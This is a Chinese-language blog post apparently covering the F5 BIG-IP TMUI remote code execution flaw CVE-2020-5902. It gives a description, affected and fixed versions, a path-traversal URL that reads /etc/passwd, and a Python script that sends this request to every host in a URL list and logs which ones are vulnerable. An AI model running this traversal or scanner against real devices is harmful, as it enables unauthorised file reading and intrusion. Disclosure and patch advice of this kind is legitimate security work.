BIG-IP ADC RCE漏洞(CVE-2020-5902)

F5(F5 Networks)作為全球領先的應用傳遞網絡(ADN)領域的廠商,6月被曝出BIG-IP(負載均衡)中兩個嚴重漏洞,代号分别為CVE-2020-5902和CVE-2020-5903，就在上次HW期間，就見到過很多這個F5的裝置，金融企業存在這種高危漏洞，想想都可怕。

一丶漏洞簡介

　　該漏洞是BIG-IP管理界面中稱為“遠端代碼執行”漏洞，稱為TMUI(流量管理使用者界面)。未經身份驗證的攻擊者可以通過将惡意制作的HTTP請求發送到托管用于BIG-IP配置的流量管理使用者界面(TMUI)實用程式的易受攻擊的伺服器來遠端利用此漏洞。

　　成功利用此漏洞可能使攻擊者獲得對該裝置的完全管理者控制，最終使他們無需任何授權就可以在受感染的裝置上執行他們想要的任何任務。攻擊者可以建立或删除檔案，禁用服務，攔截資訊，執行任意系統指令和Java代碼，破壞整個系統，并采取進一步的目标，如内部網絡，在這種情況下，RCE是由多個元件中的安全漏洞導緻的，例如允許目錄周遊的元件。

　　該漏洞影響公司的BIG-IP産品。這些是可以用作Web流量整形系統，負載平衡器，防火牆，通路網關，速率限制器或SSL中間件的多功能網絡裝置。

二丶影響版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

三丶漏洞複現

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

import requests
import urllib.parse
import pandas as pd
import time
import warnings
warnings.filterwarnings('ignore')
def az(urls):
	try:
		cc = urls+ ("/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd")
		res=requests.get(url =cc,verify = False)
		res.raise_for_status()
		if res.status_code == 200:
			with open('Vulnerability.txt', mode='a', encoding='utf-8') as f:
				f.write(urls+'\n')
	except requests.RequestException as e:
		print(e)
	time.sleep(1)
	print(cc)
	print(res)

	

def main():
	
	url_lst=[]
	#     f=open('ip.txt',encoding='utf8')
	f = pd.read_csv(open(r'url.txt'))
	#     ip_str=f.readlines()
	for u in list(f['U']):
	    u=u.replace(' ', '')
	    u=u.replace('\n', '')
	    u_lst=[u]
	    url_lst=url_lst+u_lst
	for i in url_lst:
		az(i)
if __name__ == '__main__':
    main()
           

四丶漏洞修複

F5官方已經釋出最新版本修複了該漏洞，受影響的使用者應盡快更新進行防護。

• F5 BIG-IP  15.1.0.4
• F5 BIG-IP  14.1.2.6
• F5 BIG-IP  13.1.3.4
• F5 BIG-IP  12.1.5.2
• F5 BIG-IP  11.6.5.2